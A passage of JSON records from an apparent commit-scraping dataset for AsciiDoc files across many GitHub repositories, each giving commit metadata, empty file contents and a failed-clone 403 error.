2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31d70dec99cf12510387e5c87f39d2bb4498e027","subject":"Adding doc guidelines topic","message":"Adding doc guidelines topic\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"doc_guidelines.adoc","new_file":"doc_guidelines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9928a79134668fc0672b735abbd291a8f3dc589c","subject":"Create datasource.asciidoc","message":"Create datasource.asciidoc","repos":"apaolini\/nagios-plugin-jbossas7,aparnachaudhary\/nagios-plugin-jbossas7,apaolini\/nagios-plugin-jbossas7","old_file":"datasource.asciidoc","new_file":"datasource.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aparnachaudhary\/nagios-plugin-jbossas7.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"65ae6f204c751c09bd88a855994204d1e7e9b004","subject":"zsh: Add a readme","message":"zsh: Add a readme\n\nThere are already a few intricacies to this configuration. Because one\nof the tracked files is supposed to house secrets, there are some steps\nthe user has to take, which I cannot track via git.\n\nThis might change in the future, if I ever decide to provide some kind\nof installation script or a Makefile, but at the moment the user has to\nrun some commands by hand.\n\nThus it is imperative to have a readme for this configuration if the\nuser wants to make full use of the configuration's features.\n","repos":"PigeonF\/.dotfiles","old_file":"zsh\/README.adoc","new_file":"zsh\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88a61d3d57f22a214c32a8c343c2dcb5bc88d3e1","subject":"Adding overview for docsite","message":"Adding overview for docsite\n","repos":"vaadin\/angular2-polymer,platosha\/angular-polymer,platosha\/angular-polymer,platosha\/angular-polymer,vaadin\/angular2-polymer","old_file":"docs\/overview.adoc","new_file":"docs\/overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vaadin\/angular2-polymer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b0993fa7030e53d5abc21c5ed74570cb3bada6b","subject":"job: #11367 Introducing note for changes to the MM for WASL.","message":"job: #11367 Introducing note for changes to the MM for WASL.\n","repos":"rmulvey\/mc,cortlandstarrett\/mc,lwriemen\/mc,xtuml\/mc,leviathan747\/mc,lwriemen\/mc,cortlandstarrett\/mc,xtuml\/mc,xtuml\/mc,leviathan747\/mc,lwriemen\/mc,leviathan747\/mc,lwriemen\/mc,leviathan747\/mc,leviathan747\/mc,rmulvey\/mc,xtuml\/mc,lwriemen\/mc,rmulvey\/mc,cortlandstarrett\/mc,xtuml\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,rmulvey\/mc,cortlandstarrett\/mc,xtuml\/mc,rmulvey\/mc,lwriemen\/mc,leviathan747\/mc,rmulvey\/mc","old_file":"doc\/notes\/11444_wasl\/11367_wasl_mm_int.adoc","new_file":"doc\/notes\/11444_wasl\/11367_wasl_mm_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"17332c351d49fbe8d496e6bb13c7fe2fc2781346","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03d729bf468782fb994e9463e95ecbfd5a81a470","subject":"Start README.asciidoc","message":"Start README.asciidoc\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"155d46b6cc314fe92b31fa04402ff45e38cce8a0","subject":"Well, perhaps it only needs to be escaped at the beginning","message":"Well, perhaps it only needs to be escaped at the beginning\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"14de8ac579af24d6033ca7c88d80f7d7860dd6d6","subject":"Updating stylistic highlighting of class names therein readme.asciidoc","message":"Updating stylistic highlighting of class names therein readme.asciidoc\n","repos":"lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine,Applemann\/hypatia,lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine,Applemann\/hypatia,brechin\/hypatia,brechin\/hypatia","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lillian-lemmer\/hypatia.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a1f72cc47895501a7410512021ea3b84a018de2","subject":"Update 2016-07-24-Guardians-of-the-Galaxy-Mission-BREAKOUT-announced.adoc","message":"Update 2016-07-24-Guardians-of-the-Galaxy-Mission-BREAKOUT-announced.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-07-24-Guardians-of-the-Galaxy-Mission-BREAKOUT-announced.adoc","new_file":"_posts\/2016-07-24-Guardians-of-the-Galaxy-Mission-BREAKOUT-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84cfda4b3f7eb5a4b001f1cca9edfe6808d6bbfa","subject":"Not XHTML but HTML in XML syntax","message":"Not XHTML but HTML in XML syntax\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"HTML to DOM.adoc","new_file":"HTML to DOM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c4e6d57a00bc9fd00204ff7d4c400a94d6dd4ff","subject":"HAlerts tutorial lesson 6 announcement","message":"HAlerts tutorial lesson 6 announcement\n","repos":"objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2017\/04\/27\/hawkular-alerting-tutorial-l6.adoc","new_file":"src\/main\/jbake\/content\/blog\/2017\/04\/27\/hawkular-alerting-tutorial-l6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7cf35c7f95be1a70967494d7ef4876ead9e0c2e2","subject":"Minor change","message":"Minor change\n","repos":"mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment","old_file":"src\/sections\/08-install-mysql.adoc","new_file":"src\/sections\/08-install-mysql.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mlocati\/MyDevelopmentEnvironment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf54f3a672c0aef6ca073163fa01a88d09cd0e4e","subject":"Update 2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-on-Ubuntu.adoc","message":"Update 2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-on-Ubuntu.adoc","repos":"nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io","old_file":"_posts\/2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-on-Ubuntu.adoc","new_file":"_posts\/2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-on-Ubuntu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nnn-dev\/nnn-dev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a830759a96082592fb0c0810a37cf7fff61719f","subject":"Update 20161110-1232-showoff-zone.adoc","message":"Update 20161110-1232-showoff-zone.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/20161110-1232-showoff-zone.adoc","new_file":"_posts\/20161110-1232-showoff-zone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a6446b081aec7f6e516dce6d80dd30c48954ad0","subject":"Update 2017-06-13-Making-a-change.adoc","message":"Update 2017-06-13-Making-a-change.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-06-13-Making-a-change.adoc","new_file":"_posts\/2017-06-13-Making-a-change.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0ac010510634d48d8a0c5e02daca95b26489bfd","subject":"Update 2017-09-03-Your-Blog-title.adoc","message":"Update 2017-09-03-Your-Blog-title.adoc","repos":"dvmoomoodv\/hubpress.io,dvmoomoodv\/hubpress.io,dvmoomoodv\/hubpress.io,dvmoomoodv\/hubpress.io","old_file":"_posts\/2017-09-03-Your-Blog-title.adoc","new_file":"_posts\/2017-09-03-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dvmoomoodv\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1cae2de23e610c315ee28ed61a55beac3e45816","subject":"Update 2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-22.adoc","message":"Update 2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-22.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-22.adoc","new_file":"_posts\/2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-22.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a90df5fd89a995b57c25aca5f7612c439ab1415","subject":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","message":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d082614bee33efcf91377dd8add4189f5e4db243","subject":"Update 2017-02-25-image-File-Reader.adoc","message":"Update 2017-02-25-image-File-Reader.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-25-image-File-Reader.adoc","new_file":"_posts\/2017-02-25-image-File-Reader.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25b6a946f7c34fcc015d4706a58704c9e87383c9","subject":"Elementi nel preambolo","message":"Elementi nel preambolo\n","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"sintassi.adoc","new_file":"sintassi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"01cf76293303c21ea7156e582f370145cb1a43fa","subject":"Update 2017-02-07-Best-practices-for-docker-compose-Part-1-Modularization.adoc","message":"Update 2017-02-07-Best-practices-for-docker-compose-Part-1-Modularization.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-Best-practices-for-docker-compose-Part-1-Modularization.adoc","new_file":"_posts\/2017-02-07-Best-practices-for-docker-compose-Part-1-Modularization.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2070dae58525df02ad0b9ea647d54191d129b218","subject":"start the serverless docs","message":"start the serverless docs\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/topic\/serverless.adoc","new_file":"docs\/src\/main\/asciidoc\/topic\/serverless.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4fabfa7477923c359beb2e49dcc8e8e95d0b5a71","subject":"Update 2018-05-16-why-not-wrote.adoc","message":"Update 2018-05-16-why-not-wrote.adoc","repos":"pokev25\/pokev25.github.io,pokev25\/pokev25.github.io,pokev25\/pokev25.github.io,pokev25\/pokev25.github.io","old_file":"_posts\/2018-05-16-why-not-wrote.adoc","new_file":"_posts\/2018-05-16-why-not-wrote.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pokev25\/pokev25.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e86e046ac5c0344ec30d474e92b1792b3a8b2685","subject":"#245 Added programmatic API documentation","message":"#245 Added programmatic API documentation\n","repos":"remkop\/picocli,remkop\/picocli,remkop\/picocli,remkop\/picocli","old_file":"docs\/picocli-3.0-programmatic-api.adoc","new_file":"docs\/picocli-3.0-programmatic-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remkop\/picocli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"effe4efc0722e5aedb7f153aa5b80b2c9ca2dded","subject":"Update 2018-02-05-.adoc","message":"Update 2018-02-05-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-05-.adoc","new_file":"_posts\/2018-02-05-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"966f4bc9a7ba2286023ce319c36653afe37f5fd6","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e896e9bd1cf2b46895e4fef44064af7df304ac5c","subject":"Publish 2014-05-0-Query-parameters-talk-slides.adoc","message":"Publish 2014-05-0-Query-parameters-talk-slides.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"2014-05-0-Query-parameters-talk-slides.adoc","new_file":"2014-05-0-Query-parameters-talk-slides.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36829683e3829e35a9957eae9a82ba55ecf91891","subject":"y2b create post Apple iPhone X + iPhone 8 Event Livestream 2017 (Part 1)","message":"y2b create post Apple iPhone X + iPhone 8 Event Livestream 2017 (Part 1)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-12-Apple-iPhone-X--iPhone-8-Event-Livestream-2017-Part-1.adoc","new_file":"_posts\/2017-09-12-Apple-iPhone-X--iPhone-8-Event-Livestream-2017-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecb110284363a0ce6632b654cf65075009ad063a","subject":"Update 2015-02-18-Coder-module.adoc","message":"Update 2015-02-18-Coder-module.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2015-02-18-Coder-module.adoc","new_file":"_posts\/2015-02-18-Coder-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51af149f015d1fa464cbddd873157ababe1e172a","subject":"Added IoCs for mekotio","message":"Added IoCs for mekotio\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"mekotio\/README.adoc","new_file":"mekotio\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"19a85b58ba3469a4ecabde5e4dbcd35644068a6d","subject":"Update 2016-11-16-Setting-up-Angular2-CLI-with-Maven-in-enterprise-network-2.adoc","message":"Update 2016-11-16-Setting-up-Angular2-CLI-with-Maven-in-enterprise-network-2.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/hubpress,pdudits\/hubpress,pdudits\/pdudits.github.io,pdudits\/hubpress,pdudits\/hubpress,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2016-11-16-Setting-up-Angular2-CLI-with-Maven-in-enterprise-network-2.adoc","new_file":"_posts\/2016-11-16-Setting-up-Angular2-CLI-with-Maven-in-enterprise-network-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7431c87ef3ff5989936ad92ff2169c4b043450a2","subject":"create post Unlock Any MacBook Without The Password","message":"create post Unlock Any MacBook Without The Password","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Unlock-Any-MacBook-Without-The-Password.adoc","new_file":"_posts\/2018-02-26-Unlock-Any-MacBook-Without-The-Password.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63c299f812562239a1678ec9d26ee6b3f7819fef","subject":"apidoc notes","message":"apidoc notes\n","repos":"lillian-lemmer\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,brechin\/hypatia,Applemann\/hypatia,brechin\/hypatia,lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine","old_file":"sphinx-source\/readme.asciidoc","new_file":"sphinx-source\/readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lillian-lemmer\/hypatia.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32606a6b687c0a8b46ec1172b464c69b9c11d3f2","subject":"Update 2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","message":"Update 2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","new_file":"_posts\/2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6d1d7d55e322a5e4689b81e63e6720274fef717","subject":"Update 2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","message":"Update 2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_file":"_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97cb16d93ccef0c0f8ff2416abbef3609e14d682","subject":"Update 2016-08-11-2016-08-10.adoc","message":"Update 2016-08-11-2016-08-10.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-11-2016-08-10.adoc","new_file":"_posts\/2016-08-11-2016-08-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5e62b2dac58fcb4a9bf735b28c104d8da0e6df8","subject":"Update index.adoc","message":"Update index.adoc","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e14fc294449997999e6d7c8a8e39b539112d6b92","subject":"y2b create post THE CRAZIEST SWISS ARMY KNIFE","message":"y2b create post THE CRAZIEST SWISS ARMY KNIFE","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-29-THE-CRAZIEST-SWISS-ARMY-KNIFE.adoc","new_file":"_posts\/2016-06-29-THE-CRAZIEST-SWISS-ARMY-KNIFE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f8a83e7b4b94571e8321f22255a59b2136bfbae","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a22d39f85dc663dbf197b7ebe35ab1e10a22c53f","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e7b911b0ba3a5c6fe62804ac642f1d95cb9cc57","subject":"Correct readme","message":"Correct readme\n\nChange-Id: Ia9e0ffd41322e58f8f3aeabc33a6134e451b5492\n","repos":"jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2012860a86b9c7c03e9416f2f2a003b13d7d903","subject":"Update README","message":"Update README\n","repos":"pjanouch\/hex","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/hex.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"e343ff90b075ad71174d0c1d3d7f95a1f579180d","subject":"Update 2015-09-23-Garbage-Collection.adoc","message":"Update 2015-09-23-Garbage-Collection.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-23-Garbage-Collection.adoc","new_file":"_posts\/2015-09-23-Garbage-Collection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7b059c493770379ec8f17581593e3ef312448d3","subject":"Update 2019-03-10-And-thats-an-Email.adoc","message":"Update 